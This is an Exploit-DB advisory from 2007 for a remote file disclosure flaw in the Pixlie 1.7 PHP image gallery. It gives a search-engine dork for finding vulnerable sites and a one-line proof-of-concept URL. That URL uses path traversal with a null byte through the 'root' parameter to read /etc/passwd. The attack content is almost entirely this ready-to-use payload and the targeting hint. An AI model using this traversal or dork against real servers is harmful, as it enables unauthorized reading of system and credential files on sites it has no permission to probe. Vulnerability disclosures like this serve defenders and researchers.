Pixlie 1.7 - 'pixlie.php?root' Remote File Disclosure

EDB-ID:

4278


Author:

Rizgar

Type:

webapps


Platform:

PHP

Date:

2007-08-10


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Pixlie 1.7 Remote File Disclosure Vulnerability
-----------------------------------------------------------------------

Script : Pixlie 1.7

Version : 1.7

Site : http://www.pixlie.de/download.php

Founder : Rizgar

Contact : rizgar@linuxmail.org and irc.gigachat.net #kurdhack

Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)

d0rk : "Pixlie - die kostenlose Bildergalerie"

-----------------------------------------------------------------------

look at pixlie.php


//$root = "/home/www/IhrBenutzer/html";



PoC :

http://www.example.com/pixlie.php?root=../../../../../etc/passwd%00

# milw0rm.com [2007-08-10]